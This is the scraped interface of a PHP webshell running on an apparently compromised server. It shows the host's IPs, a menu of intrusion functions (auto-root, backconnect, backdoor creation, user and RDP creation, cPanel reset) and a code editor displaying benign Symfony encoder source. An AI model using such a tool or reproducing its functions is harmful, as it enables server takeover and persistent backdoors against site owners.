Linux lionsclub 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.29 (Ubuntu)
: 161.35.52.75 | : 18.224.8.221
Cant Read [ /etc/named.conf ]
7.4.28
www-data
shells.trxsecurity.org
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
Backdoor Scanner
Backdoor Create
Alfa Webshell
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
lionsclub /
core /
vendor /
symfony /
mime /
Encoder /
[ HOME SHELL ]
Name
Size
Permission
Action
AddressEncoderInterface.php
689
B
-rw-r--r--
Base64ContentEncoder.php
1.3
KB
-rw-r--r--
Base64Encoder.php
1.25
KB
-rw-r--r--
Base64MimeHeaderEncoder.php
1.26
KB
-rw-r--r--
ContentEncoderInterface.php
668
B
-rw-r--r--
EightBitContentEncoder.php
834
B
-rw-r--r--
EncoderInterface.php
717
B
-rw-r--r--
IdnAddressEncoder.php
1.17
KB
-rw-r--r--
MimeHeaderEncoderInterface.php
467
B
-rw-r--r--
QpContentEncoder.php
1.78
KB
-rw-r--r--
QpEncoder.php
7.7
KB
-rw-r--r--
QpMimeHeaderEncoder.php
1.05
KB
-rw-r--r--
Rfc2231Encoder.php
1.41
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Base64ContentEncoder.php
<?php /* * This file is part of the Symfony package. * * (c) Fabien Potencier <fabien@symfony.com> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Symfony\Component\Mime\Encoder; use Symfony\Component\Mime\Exception\RuntimeException; /** * @author Fabien Potencier <fabien@symfony.com> */ final class Base64ContentEncoder extends Base64Encoder implements ContentEncoderInterface { public function encodeByteStream($stream, int $maxLineLength = 0): iterable { if (!\is_resource($stream)) { throw new \TypeError(sprintf('Method "%s" takes a stream as a first argument.', __METHOD__)); } $filter = stream_filter_append($stream, 'convert.base64-encode', \STREAM_FILTER_READ, [ 'line-length' => 0 >= $maxLineLength || 76 < $maxLineLength ? 76 : $maxLineLength, 'line-break-chars' => "\r\n", ]); if (!\is_resource($filter)) { throw new RuntimeException('Unable to set the base64 content encoder to the filter.'); } while (!feof($stream)) { yield fread($stream, 16372); } stream_filter_remove($filter); } public function getName(): string { return 'base64'; } }
Close